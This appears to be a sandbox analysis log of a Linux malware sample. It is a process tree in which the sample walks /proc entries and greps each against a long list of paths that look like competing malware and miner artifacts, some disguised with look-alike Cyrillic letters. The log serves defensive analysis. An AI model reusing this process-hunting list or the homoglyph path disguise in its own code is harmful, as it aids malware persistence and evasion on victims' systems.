/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1043
-
-
/bin/grepgrep exe2⤵PID:1048
-
-
/bin/lsls -latrh /proc/7102⤵PID:1047
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1051
-
-
/bin/grepgrep exe2⤵PID:1054
-
-
/bin/lsls -latrh /proc/7132⤵PID:1053
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1057
-
-
/bin/grepgrep exe2⤵PID:1061
-
-
/bin/lsls -latrh /proc/7172⤵PID:1060
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1064
-
-
/bin/grepgrep exe2⤵PID:1069
-
-
/bin/lsls -latrh /proc/7182⤵PID:1068
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1072
-
-
/bin/grepgrep exe2⤵PID:1076
-
-
/bin/lsls -latrh /proc/722⤵PID:1075
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1081
-
-
/bin/grepgrep exe2⤵PID:1085
-
-
/bin/lsls -latrh /proc/732⤵PID:1084
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1088
-
-
/bin/grepgrep exe2⤵PID:1091
-
-
/bin/lsls -latrh /proc/7352⤵PID:1090
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1093
-
-
/bin/grepgrep exe2⤵PID:1096
-
-
/bin/lsls -latrh /proc/742⤵PID:1095
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1099
-
-
/bin/grepgrep exe2⤵PID:1102
-
-
/bin/lsls -latrh /proc/752⤵PID:1101
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1104
-
-
/bin/grepgrep exe2⤵PID:1107
-
-
/bin/lsls -latrh /proc/762⤵PID:1106
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1109
-
-
/bin/grepgrep exe2⤵PID:1112
-
-
/bin/lsls -latrh /proc/772⤵PID:1111
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1114
-
-
/bin/grepgrep exe2⤵PID:1117
-
-
/bin/lsls -latrh /proc/782⤵PID:1116
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1119
-
-
/bin/grepgrep exe2⤵PID:1122
-
-
/bin/lsls -latrh /proc/82⤵PID:1121
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1124
-
-
/bin/grepgrep exe2⤵PID:1127
-
-
/bin/lsls -latrh /proc/812⤵PID:1126
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1129
-
-
/bin/grepgrep exe2⤵PID:1132
-
-
/bin/lsls -latrh /proc/822⤵PID:1131
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1134
-
-
/bin/grepgrep exe2⤵PID:1137
-
-
/bin/lsls -latrh /proc/92⤵PID:1136
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1139
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1141
-
-
/bin/grepgrep exe2⤵PID:1142
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1144
-
-
/bin/grepgrep exe2⤵PID:1147
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1146
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1149
-
-
/bin/grepgrep exe2⤵PID:1152
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1151
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1154
-
-
/bin/grepgrep exe2⤵PID:1157
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1156
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1159
-
-
/bin/grepgrep exe2⤵PID:1162
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1161
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1164
-
-
/bin/grepgrep exe2⤵PID:1167
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1166
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1169
-
-
/bin/grepgrep exe2⤵PID:1172
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1171
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1174
-
-
/bin/grepgrep exe2⤵PID:1177
-
-
/bin/lsls -latrh /proc/devices2⤵
- Reads runtime system information
PID:1176
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1179
-
-
/bin/grepgrep exe2⤵PID:1182
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1181
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1184
-
-
/bin/grepgrep exe2⤵PID:1187
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1186
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1189
-
-
/bin/grepgrep exe2⤵PID:1192
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1191
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1194
-
-
/bin/grepgrep exe2⤵PID:1197
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1196
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1199
-
-
/bin/grepgrep exe2⤵PID:1202
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1201
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1204
-
-
/bin/grepgrep exe2⤵PID:1207
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1206
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1209
-
-
/bin/grepgrep exe2⤵PID:1215
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1214
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1217
-
-
/bin/grepgrep exe2⤵PID:1220
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1219
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1222
-
-
/bin/grepgrep exe2⤵PID:1225
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1224
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1227
-
-
/bin/grepgrep exe2⤵PID:1230
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1229
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1232
-
-
/bin/grepgrep exe2⤵PID:1235
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1234
-
-
